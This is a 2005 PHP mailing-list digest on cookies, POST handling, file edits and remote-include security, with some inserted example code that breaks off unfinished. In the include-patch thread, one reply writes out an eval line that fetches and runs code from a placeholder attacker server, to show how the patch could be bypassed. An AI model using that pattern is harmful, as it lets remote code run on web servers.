php-general Digest 2 Mar 2005 21:26:32 -0000 Issue 3315

php-general-digest-helplists.php.net
Date: Wed Mar 02 2005 - 15:26:32 CST


Topics (messages 209783 through 209854):

Re: _POST not working (using mini_httpd) - 2 attachments
        209783 by: overbored

Re: Setting cookie on first visit
        209784 by: yangshiqi
        209810 by: Dan Tappin
        209840 by: Richard Lynch

sql query
        209785 by: William Stokes
        209787 by: M. Sokolewicz
        209809 by: Jason Petersen
        209822 by: William Stokes

Delete last 15 chars from a file
        209786 by: Shaun
        209788 by: M. Sokolewicz

Re: How can I secure database passwords used by PHP
        209789 by: Jason Barnett

Re: Authentication fails
        209790 by: John Swartzentruber
        209792 by: Jason Barnett
        209803 by: John Swartzentruber
        209836 by: Richard Lynch
        209837 by: Richard Lynch
        209844 by: John Swartzentruber

Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
        209791 by: Jason Barnett
        209797 by: Markus Mayer
        209802 by: Jason Wong
        209805 by: Bostjan Skufca . domenca.com
        209806 by: Tom Z Meinlschmidt
        209830 by: Richard Lynch
        209831 by: Richard Lynch
        209839 by: Jason Wong

Re: PHP slowness
        209793 by: Markus Mayer

Re: Spam and this list
        209794 by: AdamT

Re: [NEWBIE] How to allow for <a href> tags but no others? [SOLVED]
        209795 by: Dave

PHP5 DOM - DomDocumentFragments empty
        209796 by: Tobias Tom
        209848 by: Jason Barnett

Re: combining values
        209798 by: Ford, Mike
        209808 by: M. Sokolewicz

Mistaken Identity - Was: Anti-password trading/sharing solutions
        209799 by: Dan Tappin

Re: How can I secure database passwords used by PHP webpages
        209800 by: Dan Tappin
        209813 by: Chris W. Parker
        209843 by: Richard Lynch

mailserver logfile analyser
        209801 by: woldhekkie
        209834 by: Richard Lynch

php-general-unsubscribelists.php.net
        209804 by: Raúl Castro Marín

Connecting to a AS/400?
        209807 by: Frank Arensmeier
        209829 by: Richard Lynch
        209835 by: Frank Arensmeier
        209841 by: Stephen Johnson

[suspicious - maybe spam] Re: [PHP] Connecting to a AS/400?
        209811 by: Dan Tappin

update of mysql to 4.1
        209812 by: Peter

update of mysql to 4.x
        209814 by: Peter
        209815 by: John Nichel
        209842 by: Peter
        209845 by: Marek Kilimajer
        209850 by: John Nichel

Re: Open source portal systems???
        209816 by: Judson Vaughn

Bypassing php.ini setting for file uploads?
        209817 by: Matt Cassarino
        209826 by: Ian Firla
        209827 by: Richard Lynch

Download with header() - file corrupted
        209818 by: Werner Jäger
        209824 by: Richard Lynch

FREETYPE and GD
        209819 by: Aaron Todd
        209823 by: Richard Lynch
        209853 by: Aaron Todd

Re: PHP 5.1 CVS Interface Question
        209820 by: Gavin Roy

Re: php DBMS
        209821 by: Gerben
        209825 by: Chris W. Parker
        209828 by: Chris W. Parker

Document root, preferred way to find it???
        209832 by: Al
        209846 by: Chris W. Parker

PHP Sessions?
        209833 by: rory walsh
        209851 by: Chris W. Parker
        209854 by: rory walsh

Re: Logging with PHP to SMTP server
        209838 by: Richard Lynch

Re: Supporting "Cancel"
        209847 by: Richard Lynch

loggin into linux account
        209849 by: Vaibhav Sibal

Re: Catalog or cart
        209852 by: Robby Russell

Administrivia:

To subscribe to the digest, e-mail:
        php-general-digest-subscribelists.php.net

To unsubscribe from the digest, e-mail:
        php-general-digest-unsubscribelists.php.net

To post to the list, e-mail:
        php-generallists.php.net

----------------------------------------------------------------------

attached mail follows:


ceol-i-e.com (Richard Lynch) wrote in
news:2413.66.99.91.45.1109711656.squirrelwww.l-i-e.com:

> overbored wrote:
>> Hi all, I'm learning PHP and I'd need to create a simple Web-based
>> ifconfig
>> tool for a Soekris box (running Pebble). However, I've been
>> unsuccessful at
>> getting PHP working with mini_httpd. In particular, the POST data is
>> not being received. Here's what I did...
>>
>> First, I applied (only) the SCRIPT_FILENAME and index.php
>> modifications to mini_httpd.c, as suggested in:
>>
>> http://m0n0.ch/wall/list/?action=show_msg&actionargs[]=15&actionargs[]
>> =11
>>
>> Then I built & installed this on a (regular) Debian box, which had
>> php4 installed from apt. (This doesn't seem related, but for some
>> reason, when I
>> start up, I get a warning: "socket: Address family not supported by
>> protocol".)
>
> This is probably about IP6 -- at least if it's during boot-up.
> What are the lines immediately before/after that?
> If they say anything about IP6, you're almost for sure okay.
> That just means some software isn't ready for IP6 and some is -- Which
> is pretty much the current state of the industry.

There are no lines before/after that; it's the only output I see.

>> Next, I created some simple PHP files, and I found that POST data
>> isn't getting through at all. Googling didn't really turn up much,
>> and I know this is possible because the m0n0wall project does just
>> this (download their rootfs and look at the PHP files under
>> /usr/local/www). Basically, _POST/_GET/_REQUEST never exist, and it
>> seems the only way I can
>> get the data is with GET and parsing the HTTP_ENV_VARS.
>
> If it's older PHP, try $HTTP_POST_VARS and $HTTP_GET_VARS and so on.

I have PHP 4.3.10-2. If you see test.php, I did have a test for
$HTTP_POST_VARS in there. I just added a similar test for $HTTP_GET_VARS,
and it also prints nothing.

> Other than that, I'd have to say double-check the settings of
> mini_httpd -- and try a mini_httpd mailing list.
>
> PHP doesn't really *do* a whole lot with the GET/POST data from the
> server.
>
> It's kinda just "there" or "not there" for PHP to work with...
>
> Not saying PHP isn't maybe looking in the "wrong" place for where
> mini_httpd wants to send it, but I think that's all spelled out in the
> CGI standard.
>
> Yes, the PHP Module and all other Modules conform to the CGI standard
> -- that's how they work.
>
> It's just that CGI got appropriated over time to mean something other
> than what it actually meant originally, and, well, there it is.
>
> PS Don't send attachments. Put 'em on-line and send URLs.

Sorry. I was actually told to do the opposite once, when I provided URLs.

attached mail follows:


When the user first visits your site, there is no skin in your cookie. Then
you can give a default value. And after the user modifies his/her profile,
you can set it to the cookie. So I don't think it is a problem of setting
cookie.

 
Best regards,
Yang Shiqi
 
 
 

-----Original Message-----
From: Tom Whitbread [mailto:tomretinalnerve.com]
Sent: Wednesday, March 02, 2005 5:18 PM
To: php-general lists
Subject: [PHP] Setting cookie on first visit

I am using a cookie to detect what skin a user wants to display. The
problem is if a user visits the site for the first time the cookie is
not being set. I am detecting if it's being set or not with

if(!isset($_COOKIE['skin'])){ ... }

It's not setting the cookie until a user refreshes the page once. How
can I ensure it's set when it hasn't been set before?

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

attached mail follows:


The manual details this issue:

http://ca.php.net/setcookie

You can't see the cookie until you hit the next page. There is no way
to view the newly set cookie.

Dan Tappin

On Mar 2, 2005, at 2:18 AM, Tom Whitbread wrote:

> I am using a cookie to detect what skin a user wants to display. The
> problem is if a user visits the site for the first time the cookie is
> not being set. I am detecting if it's being set or not with
>
> if(!isset($_COOKIE['skin'])){ ... }
>
> It's not setting the cookie until a user refreshes the page once. How
> can I ensure it's set when it hasn't been set before?
>

attached mail follows:


Tom Whitbread wrote:
> I am using a cookie to detect what skin a user wants to display. The
> problem is if a user visits the site for the first time the cookie is
> not being set. I am detecting if it's being set or not with
>
> if(!isset($_COOKIE['skin'])){ ... }
>
> It's not setting the cookie until a user refreshes the page once. How
> can I ensure it's set when it hasn't been set before?

Sure it's being set.

That's how you see it when they refresh the page.

$_COOKIE tells you what Cookies the browser *sent* with the request for
the URL.

It's up to you to track within that script what Cookies you are sending
*back* with the answer.

That sounds kinda harsh, and I can see why you'd want it to work the other
way -- as I first did.

But you *need* COOKIES to be what the browser sent initially.

I guess you *could* start doing things like:
<?php
  setcookie('var', $value);
  $_COOKIE['var'] = $value;
?>
and then it would do what you want...

But you could quickly confuse yourself about what came *in* from the
browser and what you are sending *out* to the browser.

Probably better for you to take a step back and think about how cookies
work, and who sends what where.

--
Like Music?
http://l-i-e.com/artists.htm
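
Added example (not part of the message above or of the thread): the request/response split it describes, written so that a first visit renders a default skin while the Set-Cookie header goes out for the next request. The skin names, pick_skin() and the sample cookie arrays are assumptions made up for illustration; the cookie is treated as client-controlled input and checked against an allowlist.

```php
<?php
// Added example, not from the thread. SKINS, DEFAULT_SKIN and pick_skin()
// are hypothetical names; requires PHP 7.1+.
const SKINS = ['classic', 'dark', 'print'];
const DEFAULT_SKIN = 'classic';

/**
 * Decide which skin to render for this request.
 * $cookies is what the browser SENT (normally $_COOKIE).
 * Returns [skin to use now, whether a Set-Cookie header is needed].
 */
function pick_skin(array $cookies): array
{
    $sent = $cookies['skin'] ?? null;
    // The cookie is client-controlled: accept only known skin names.
    if (is_string($sent) && in_array($sent, SKINS, true)) {
        return [$sent, false];
    }
    // First visit (or an unknown value): use the default for THIS response
    // and ask the browser to store it for the next request.
    return [DEFAULT_SKIN, true];
}

// In a page, the decision drives the response header before any output.
[$skin, $mustSet] = pick_skin($_COOKIE);
if ($mustSet && !headers_sent()) {
    setcookie('skin', $skin, time() + 30 * 86400, '/');
}

// Constructed sample requests showing the three cases.
$requests = [
    'first visit'    => [],
    'returning user' => ['skin' => 'dark'],
    'tampered value' => ['skin' => '../../etc/passwd'],
];
foreach ($requests as $label => $cookies) {
    [$chosen, $needsCookie] = pick_skin($cookies);
    printf("%-14s -> skin=%s set_cookie=%s\n",
        $label, $chosen, $needsCookie ? 'yes' : 'no');
}
```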

attached mail follows:


Hello

Can someone explain this to me. I don't know how to read this.

if (!$variable = mysql_query("select id,sessid from users where ...

What is this "if(!"

I mean the ! sign.

Thanks

-Will

attached mail follows:


! is a logical NOT operator. It simply turns true => false, and false =>
true.

So, what you have is:
$a = true;
if($a) {
        echo 'true';
} else {
        echo 'false';
}

if(!$a) {
        echo 'false!';
} else {
        echo 'true!';
}

In these 2 cases, it will echo
true and true!

More info can be found here:
http://www.php.net/manual/en/language.operators.logical.php

William Stokes wrote:
> Hello
>
> Can someone explain this to me. I don't know how to read this.
>
> if (!$variable = mysql_query("select id,sessid from users where ...
>
> What is this "if(!"
>
> I mean the ! sign.
>
> Thanks
>
> -Will

attached mail follows:


On Wed, 2 Mar 2005 13:02:39 +0200, William Stokes <kallesoperamail.com> wrote:
> Hello
>
> Can someone explain this to me. I don't know how to read this.
>
> if (!$variable = mysql_query("select id,sessid from users where ...
>
> What is this "if(!"

This is a way to run a SQL query, capture the return value, and
perform an action if the query failed. For code readability, I would
probably write that as two statements:

$variable = mysql_query("SELECT * FROM blah");
if(!$variable) { error_handler(mysql_error()); }

See the documentation for information on mysql_query return values:
http://us2.php.net/manual/en/function.mysql-query.php

Jason

attached mail follows:


OK got that. Thanks...

"Jason Petersen" <fuzzybadgmail.com> wrote in
message:5eafe1ec0503020806886216fmail.gmail.com...
> On Wed, 2 Mar 2005 13:02:39 +0200, William Stokes <kallesoperamail.com>
> wrote:
>> Hello
>>
>> Can someone explain this to me. I don't know how to read this.
>>
>> if (!$variable = mysql_query("select id,sessid from users where ...
>>
>> What is this "if(!"
>
> This is a way to run a SQL query, capture the return value, and
> perform an action if the query failed. For code readability, I would
> probably write that as two statements:
>
> $variable = mysql_query("SELECT * FROM blah");
> if(!$variable) { error_handler(mysql_error()); }
>
> See the documentation for information on mysql_query return values:
> http://us2.php.net/manual/en/function.mysql-query.php
>
> Jason

attached mail follows:


Hi,

I am trying to create an XML file, it will be done in stages so if the file
isn't present I will add the line:

<?xml version="1.0" ?>
    <root_element>

Then for each line I add I add the following

        <child_element>data<child_element>

But for various reasons the application won't know when the file is complete
so it won't have the final:

    </root_element>

To solve this I intend to add the following each time

        <child_element>data<child_element>
    </root_element>

and delete the </root_element> every time I add a new
<child_element>data<child_element>. Can anyone tell me how I can delete the
last 15 characters from a file every time I open the file?

Thanks for your help

attached mail follows:


Shaun wrote:

> Hi,
>
> I am trying to create an XML file, it will be done in stages so if the file
> isn't present I will add the line:
>
> <?xml version="1.0" ?>
> <root_element>
>
> Then for each line I add I add the following
>
> <child_element>data<child_element>
>
> But for various reasons the application won't know when the file is complete
> so it won't have the final:
>
> </root_element>
>
> To solve this I intend to add the following each time
>
> <child_element>data<child_element>
> </root_element>
>
> and delete the </root_element> every time I add a new
> <child_element>data<child_element>. Can anyone tell me how I can delete the
> last 15 characters from a file every time I open the file?
>
> Thanks for your help

first of all, why don't you simply do something like:
<?php
// Read the file, drop the old closing root tag, append the new child
// element and close the root again.
$contents = file_get_contents('file');
$contents = str_replace('</root_element>', '', $contents);
$contents .= "<child_element>data</child_element></root_element>";
file_put_contents('file', $contents);
?>

But well, to strip off the last 15 chars, simply use substr(), thus:
$contents = substr(file_get_contents('file'), 0, -15);

that will return the entire file contents - the last 15 chars.

attached mail follows:


>>
>>Who are these "other webpage maintainers" and why do they have access
>>to your PHP source code? This isn't a PHP issue. The MySQL password
>>has to be in a file as plain text; there's no getting around that (as
>>recently discussed on here). Your issue is controlling access to the
>>machine and the files, so is an OS/policy/trust issue, imo.
>

John is right. And from what you say in your response I think that
sharing database passwords isn't really the problem. It seems that
John's answer was right on - you have an OS/policy/trust issue.

If you are trying to limit access to what files the PHP user can read,
you might find this message from the archives quite useful...

http://marc.theaimsgroup.com/?l=php-general&m=109066460609993&w=2

--
Teach a man to fish...

NEW? | http://www.catb.org/~esr/faqs/smart-questions.html
STFA | http://marc.theaimsgroup.com/?l=php-general&w=2
STFM | http://php.net/manual/en/index.php
STFW | http://www.google.com/search?q=php
LAZY |
http://mycroft.mozdev.org/download.html?name=PHP&submitform=Find+search+plugins

attached mail follows:


On 3/1/2005 3:52 PM John Swartzentruber wrote:
> On 3/1/2005 2:12 PM Jason Barnett wrote:
>
>> John Swartzentruber wrote:
>>
>>> Somehow my PHP 5.0.3 or something is configured incorrectly. When I try
>>> to get past an authentication input, nothing happens. For example, I
>>> have phpMyAdmin configured now to use mysqli, but when I enter the
>>> username and password, the screen doesn't change. In previous testing, I
>>> saw that an incorrect authentication was detected and reported, but a
>>> correct authentication had no effect.
>>
>>
>>
>> Not sure if this is a phpMyAdmin bug or not, but you might try to clear
>> out all cookies that your browser has from john.swartzentruber.us. For
>> that matter you should see if you *have* any cookie set from
>> john.swartzenruber.us. I'm not pointing fingers at phpMyAdmin, but just
>> tossing out a possible solution.
>>
>>
>>> My phpinfo() output is at http://john.swartzentruber.us/test.php
>>>
>>> For example, I'm trying to use a simple file upload script called "file
>>> thingie" that is at http://www.solitude.dk/filethingie/download.php
>>>
>>> I have edited the original file only to decrease the maximum file size
>>> to 500 bytes and limit uploads to text files. I hope no one here tries
>>> to be nasty. The user name is "USERNAME2" and the password is
>>> "PASSWORD".
>>
>>
>>
>> Yeah... I wouldn't suggest putting user / pw combos onto the web even if
>> you intend on changing it later. You just never know.
>
>
> Well, if someone can get past the login page, at least someone is making
> progress :-)
>
>
>>> Can anyone check this out and give me some clues or things to look into?
>>> Is there some setting that would cause _POST data to disappear? How
>>> would I go about debugging this?
>>
>>
>>
>> Start by going to the form page's action page (since your test.php page
>> only displays phpinfo() I'm not sure what this is going to be). We'll
>> call this page action.php.
>
>
> I forgot to mention that the page in question was
> http://john.swartzentruber.us/test.php I'm working on creating an even
> simpler script, but since I'm not that familiar with either HTML forms
> or PHP, it is taking some time. In these examples, the action page is
> the same page as original page (i.e., "filethingie.php"). When I look at
> the page source (i.e., the PHP output) in my browser, this is what the
> form looks like (sorry about the word wrapping):
>
> <form action="filethingie.php" method="post">
> <h1>Please Login</h1> <input type="hidden" name="log_lang"
> value="en" /> <div>
> <label for="log_user">User: </label><input type="text"
> size="15" name="log_user" id="log_user" />
> </div>
> <div>
> <label for="log_pass">Pass: </label><input type="password"
> size="15" name="log_pass" id="log_pass" />
>
> <input type="hidden" name="action" value="login" />
> <input type="submit" value="login" />
> </div>
> </form>
>
>
>
>> The simplest way to debug this (but it's effective) is to
>> var_dump($_POST) at the top of action.php. Insert this at the very top
>> of the page (likely to cause a lot of errors :) and then gradually cut /
>> paste that code throughout the action page. Do this until you narrow
>> down the problem code.
>
>
> Well, I've been trying print_r($_POST), and it is always empty. That's
> the problem.
>
>
>> Since this is a file upload script you are doing you will probably want
>> to var_dump($_FILES) as well. Heck, if you're having *session* problems
>> then you should be looking into the $_SESSION array and (possibly) the
>> $_COOKIE array.
>
>
> I'll try removing the session stuff to see if that is significant. It
> looks like $_SESSION is also empty, although I do see what appear to be
> session files created in /tmp, which is where they go.
>
> To summarize, it appears that the problem is not with authentication per
> se, but is that $_POST is empty when the script is called from a form in
> the same file.
>
> I'll try to test this using a different action script and see what
> happens. In the meantime, if you see anything or have any other ideas,
> please let me know. I appreciate you taking the time to help.

I've got some more information and I hope someone can help me figure out
the problem. I changed my original PHP program so that the form action
script is a different script. In that file, I just do a var_dump on
$_POST and $_SERVER.

When I do that, it looks like all of the data comes through correctly.

On the other hand, when the form action script is the *same* script that
contains the form, when I do the same var_dumps, the data does *not*
have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
"POST" in this instance.

So it appears that my problem is that when I post to the same script I
am running, things don't work. I still have no idea why this would be
the case. Does anyone have any ideas?

attached mail follows:


>
> I've got some more information and I hope someone can help me figure out
> the problem. I changed my original PHP program so that the form action
> script is a different script. In that file, I just do a var_dump on
> $_POST and $_SERVER.
>
> When I do that, it looks like all of the data comes through correctly.

Super.

>
> On the other hand, when the form action script is the *same* script that
> contains the form, when I do the same var_dumps, the data does *not*
> have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
> "POST" in this instance.

My suspicion was that this was what had happened as well, but *why* your
POST is being interpreted as a GET is unclear to me. I did notice that
you were sending GET variables when you had a login error... but someone
more knowledgeable than I (Richard?) will likely come along and explain
how / why PHP can interpret a form with both POST and GET variables as a
GET script.

>
> So it appears that my problem is that when I post to the same script I
> am running, things don't work. I still have no idea why this would be
> the case. Does anyone have any ideas?

One other thing I noticed, but didn't quite understand. Your
apache2handler shows you are using port 0, but your SERVER_PORT is 80.
I don't understand the Apache side of things well enough to untangle
that one either.


attached mail follows:


On 3/2/2005 9:22 AM Jason Barnett wrote:
>>On the other hand, when the form action script is the *same* script that
>>contains the form, when I do the same var_dumps, the data does *not*
>>have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
>>"POST" in this instance.
>
>
> My suspicion was that this was what had happened as well, but *why* your
> POST is being interpreted as a GET is unclear to me. I did notice that
> you were sending GET variables when you had a login error... but someone
> more knowledgeable than I (Richard?) will likely come along and explain
> how / why PHP can interpret a form with both POST and GET variables as a
> GET script.

I don't know, but in this particular case, it shouldn't be significant
because I see the problem when there is no error, so the GET variables
aren't needed.

>>So it appears that my problem is that when I post to the same script I
>>am running, things don't work. I still have no idea why this would be
>>the case. Does anyone have any ideas?
>
>
> One other thing I noticed, but didn't quite understand. Your
> apache2handler shows you are using port 0, but your SERVER_PORT is 80.
> I don't understand the Apache side of things well enough to untangle
> that one either.

That is odd. I use name-based virtual hosting, and I have both an
internal and an external address for each VirtualHost, but in all cases,
I specify the port to be 80. I don't know why apache2handler would show
0. I guess it is one more thing to google to look for clues.

attached mail follows:


>> On the other hand, when the form action script is the *same* script that
>> contains the form, when I do the same var_dumps, the data does *not*
>> have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
>> "POST" in this instance.
>
> My suspicion was that this was what had happened as well, but *why* your
> POST is being interpreted as a GET is unclear to me. I did notice that
> you were sending GET variables when you had a login error... but someone
> more knowledgeable than I (Richard?) will likely come along and explain
> how / why PHP can interpret a form with both POST and GET variables as a
> GET script.

As I recall, the POST format simply allows GET data as well.

Almost for sure POST came after GET, in terms of historical web techniques.

So when they made the spec for POST, GET data was included already.

I don't think PHP does any "magic" to make it work, really...

If his form says: method="post" and it's not sending POST and the
REQUEST_METHOD isn't POST, then the httpd server (mini_httpd, right) is
almost for sure at fault.

I'm repeating myself, but PHP pretty much just takes whatever the SERVER
sends it, and fills in $_SERVER and $_POST and $_GET based on that.

Fix mini_httpd and/or its configuration if you want to get $_POST to work.

You'll need to ask mini_httpd experts how to do that... Which ain't here.


attached mail follows:


> I've got some more information and I hope someone can help me figure out
> the problem. I changed my original PHP program so that the form action
> script is a different script. In that file, I just do a var_dump on
> $_POST and $_SERVER.
>
> When I do that, it looks like all of the data comes through correctly.
>
> On the other hand, when the form action script is the *same* script that
> contains the form, when I do the same var_dumps, the data does *not*
> have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
> "POST" in this instance.
>
> So it appears that my problem is that when I post to the same script I
> am running, things don't work. I still have no idea why this would be
> the case. Does anyone have any ideas?

Whoops!

You're *not* the mini_httpd guy, are you?
Sorry, crossed my threads.

Start digging into httpd.conf and look real careful at any changes
involving POST/GET and METHOD etc. 'diff' your httpd.conf with the one
that ships out with the software. (See "man diff")


attached mail follows:


On 3/2/2005 2:29 PM Richard Lynch wrote:
>>I've got some more information and I hope someone can help me figure out
>>the problem. I changed my original PHP program so that the form action
>>script is a different script. In that file, I just do a var_dump on
>>$_POST and $_SERVER.
>>
>>When I do that, it looks like all of the data comes through correctly.
>>
>>On the other hand, when the form action script is the *same* script that
>>contains the form, when I do the same var_dumps, the data does *not*
>>have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is "GET", not
>>"POST" in this instance.
>>
>>So it appears that my problem is that when I post to the same script I
>>am running, things don't work. I still have no idea why this would be
>>the case. Does anyone have any ideas?
>
>
> Whoops!
>
> You're *not* the mini_httpd guy, are you?
> Sorry, crossed my threads.

No, "I'm the Apache/2.0.52 (Fedora) Server at john.swartzentruber.us
Port 80" guy.

> Start digging into httpd.conf and look real careful at any changes
> involving POST/GET and METHOD etc. 'diff' your httpd.conf with the one
> that ships out with the software. (See "man diff")

I've done this and don't see anything. I'm not positive I have the
original httpd.conf file to compare against, but I have one saved in a
backup directory that is named httpd.conf.rpmnew, so I think it is
either original or from an RPM update.

My differences are:

1. additional files in DirectoryIndex
2. HostnameLookups is On
3. the /server-status and /server-info sections are uncommented (but
only accessible from my internal network)
4. Added virtual hosting stuff

I looked at all instances of GET and POST, and only see a section that
is commented out in both copies of httpd.conf.

Here is my VirtualHost for the thing I am testing (I X'd out some stuff):

<VirtualHost 66.92.XXXX.XX:80 10.X.0.3:80>
     ServerName john.swartzentruber.us
     ServerAdmin webmasXXXXXXXtzentruber.us
     DocumentRoot "/var/www/vhosts/swartzentruber.us/john/html"

     <Directory "/var/www/vhosts/swartzentruber.us/john/html">
         AllowOverride AuthConfig
         Options Indexes Includes FollowSymLinks
         Order allow,deny
         Allow from all
     </Directory>
</VirtualHost>

Is there anything funny there that would cause a problem?

attached mail follows:


Tom Z. Meinlschmidt wrote:
> Hi,
>
> I've experienced a lot of attacks in my hosting server due to silly users and
> their scripts with holes. So I prepared this little patch to 4.3.10, which
> disables using url wrappers in include/include_once/require/require_once
> statements (switchable in php.ini). See readme.security from patch
>
> patch is there:
>
> http://orin.meinlschmidt.org/~znouza/php_patch.txt
>
> comments are welcome
>
> /tom
>

http://php.net/manual/en/ini.php#ini.list

allow_url_fopen = 0


attached mail follows:


Correct me if I'm wrong, but isn't this already available in the standard PHP?
In the php.ini file, you can refuse the inclusion of url's :
        allow_url_fopen = Off

I think also Hardened PHP offers additional similar protections.

Markus

On Wednesday 02 March 2005 08:57, Tom Z. Meinlschmidt wrote:
> Hi,
>
> I've experienced a lot of attacks in my hosting server due to silly users
> and their scripts with holes. So I prepared this little patch to 4.3.10,
> which disables using url wrappers in
> include/include_once/require/require_once statements (switchable in
> php.ini). See readme.security from patch
>
> patch is there:
>
> http://orin.meinlschmidt.org/~znouza/php_patch.txt
>
> comments are welcome
>
> /tom
>

attached mail follows:


On Wednesday 02 March 2005 22:03, Jason Barnett wrote:
> Tom Z. Meinlschmidt wrote:

> > which disables using url wrappers in
> > include/include_once/require/require_once statements (switchable in
>
> http://php.net/manual/en/ini.php#ini.list
>
> allow_url_fopen = 0

I haven't had a look at the patch in question but from my understanding of
the description above, after the application of the patch the filesystem
functions (ie fopen and friends) should still be able to use URLs.
Effectively it allows finer control over opening URLs.

I would like to think that the OP wouldn't go to the trouble of creating a
patch (for the latest release of PHP no less) for functionality that
already exists! IIRC a request for something similar was made on the list
some time ago.

--
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
------------------------------------------
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
------------------------------------------
New Year Resolution: Ignore top posted posts

attached mail follows:


From system security's standpoint:

<?php
$content = file_get_contents('http://www.domain.net/file.inc');
echo $content;
?>

is OK, but

<?php
include('http://www.domain.net/file.inc');
?>

is NOT!

Nice patch, Tom, will probably use it myself too...

regards,
Bostjan

On Wednesday 02 March 2005 11:54, Markus Mayer wrote:
> Correct me if I'm wrong, but isn't this already available in the standard
> PHP? In the php.ini file, you can refuse the inclusion of url's :
> allow_url_fopen = Off
>
> I think also Hardened PHP offers additional similar protections.
>
> Markus
>
> On Wednesday 02 March 2005 08:57, Tom Z. Meinlschmidt wrote:
> > Hi,
> >
> > I've experienced a lot of attacks in my hosting server due to silly users
> > and their scripts with holes. So I prepared this little patch to 4.3.10,
> > which disables using url wrappers in
> > include/include_once/require/require_once statements (switchable in
> > php.ini). See readme.security from patch
> >
> > patch is there:
> >
> > http://orin.meinlschmidt.org/~znouza/php_patch.txt
> >
> > comments are welcome
> >
> > /tom
> >
> > --
> > =========================================================================
> >== ==== Tomas Meinlschmidt, SBN3, MCT, MCP, MCP+I, MCSE, NetApp Filer &
> > NetCache gPG fp: CB78 76D9 210F 256A ADF4 0B02 BECA D462 66AB 6F56 / $ID:
> > 66AB6F56 GCS d-(?) s: a- C++ ULHISC*++++$ P+++>++++ L+++$>++++ E--- W+++$
> > N++(+) !o !K w(---) !O !M V PS+ PE Y+ PGP++ t+ !5 X? R tv b+ !DI D+ G
> > e>+++ h---- r+++ z+++
> > =========================================================================
> >== ====

--
Best regards,

Bostjan Skufca
system administrator

Domenca d.o.o.
Phone: +386 4 5835444
Fax: +386 4 5831999
http://www.domenca.com

attached mail follows:


Tell me - how do you want to turn off remote includes and remain remote
file working?

allow_url_fopen turns off _both_. There's no choice what to disable

tom

Jason Barnett wrote:
> Tom Z. Meinlschmidt wrote:
>
>>Hi,
>>
>>I've experienced a lot of attacks in my hosting server due to silly users and
>>their scripts with holes. So I prepared this little patch to 4.3.10, which
>>disables using url wrappers in include/include_once/require/require_once
>>statements (switchable in php.ini). See readme.security from patch
>>
>>patch is there:
>>
>>http://orin.meinlschmidt.org/~znouza/php_patch.txt
>>
>>comments are welcome
>>
>>/tom
>>
>
>
> http://php.net/manual/en/ini.php#ini.list
>
> allow_url_fopen = 0
>

attached mail follows:


Tom Z Meinlschmidt wrote:
> Tell me - how do you want to turn off remote includes and remain remote
> file working?

Change the PHP source?

That's the only viable answer I can think of; though I doubt it's one you
want to hear/use.

Sorry.

> allow_url_fopen turns off _both_. There's no choice what to disable

Consider this:

<?php
  eval(implode('',file("http://evilserver.example.com")));
?>

So, like, what's the point to turning off only remote include and keeping
remote file?

Maybe you'll stop a naive newbie from something stupid, but probably not
even slow down a script kiddie, much less a dedicated attacker.

For that matter, even a naive newbie would be able to figure out the
eval(file()) solution or Google for it and find it in less than an hour.

If you turn off eval, they make a file 777 (ugh!) and then read the remote
file, write it into their 777 file, and then include that.

If you don't trust remote include, you can't trust remote files and vice
versa. That's all there is to it, really.

Anything else is simply self-delusions of "security" imho. [shrug]

--
Like Music?
http://l-i-e.com/artists.htm

attached mail follows:


Bostjan Skufca domenca.com wrote:
> From system security's standpoint:
>
> <?php
> $content = file_get_contents('http://www.domain.net/file.inc');
> echo $content;
> ?>
>
> is OK, but
>
> <?php
> include('http://www.domain.net/file.inc');
> ?>
>
> is NOT!
>
> Nice patch, Tom, will probably use it myself too...

I'll be interested to see if it works in practice...
[see previous post of mine]

Ya never know.

I still haven't figured out why spam harvesters don't find even the
simplest obfuscations like %40 and &#64;

But I guess if you come up with a billion fish every time you cast your
line, you don't worry about buying better bait.

I *suspect* this situation is different, in that you will have people
actively trying to alter their attacks to bypass this blockage, and it's
pretty simple to bypass.

But, perhaps, it will turn out to be that there are so many unpatched
wide-open places they can find that they'll never bother you again.

I sure hope so, for your sake!

--
Like Music?
http://l-i-e.com/artists.htm

attached mail follows:


On Thursday 03 March 2005 03:04, Richard Lynch wrote:
> Tom Z Meinlschmidt wrote:
> > Tell me - how do you want to turn off remote includes and remain
> > remote file working?
>
> Change the PHP source?
>
> That's the only viable answer I can think of; though I doubt it's one
> you want to hear/use.
>
> Sorry.

Funnily enough I think you'll find that he did (change the source) :)

> > allow_url_fopen turns off _both_. There's no choice what to disable
>
> Consider this:
>
> <?php
> eval(implode('',file("http://evilserver.example.com")));
> ?>
>
> So, like, what's the point to turning off only remote include and
> keeping remote file?

I believe you're missing the point of the patch. It is to prevent people
from injecting malicious remote locations in $somewhere:

  include($somewhere);

Of course one should always validate $somewhere before using it but ...

--
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
------------------------------------------
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
------------------------------------------
New Year Resolution: Ignore top posted posts
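
What validating `$somewhere` before `include` can look like, as an added example that is not part of the original thread. The pages directory, the allowlisted page names and the sample requests are assumptions made for the illustration.

```php
<?php
// Added example, not from the thread. The pages directory and the page names
// are hypothetical; the sample requests are constructed.

/**
 * Turn a request parameter into a local file that is safe to include.
 * Returns the resolved path, or null when the request must be refused.
 */
function resolve_include(string $requested, array $allowedPages, string $baseDir): ?string
{
    // 1. Refuse anything that names a stream wrapper (http://, ftp://, php://, data: ...).
    if (preg_match('/^[a-z][a-z0-9+.\-]*:/i', $requested) === 1) {
        return null;
    }

    // 2. Accept only exact names from a fixed list, so no user-built path reaches include.
    if (!in_array($requested, $allowedPages, true)) {
        return null;
    }

    // 3. Resolve symlinks and ".." and confirm the file really sits under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
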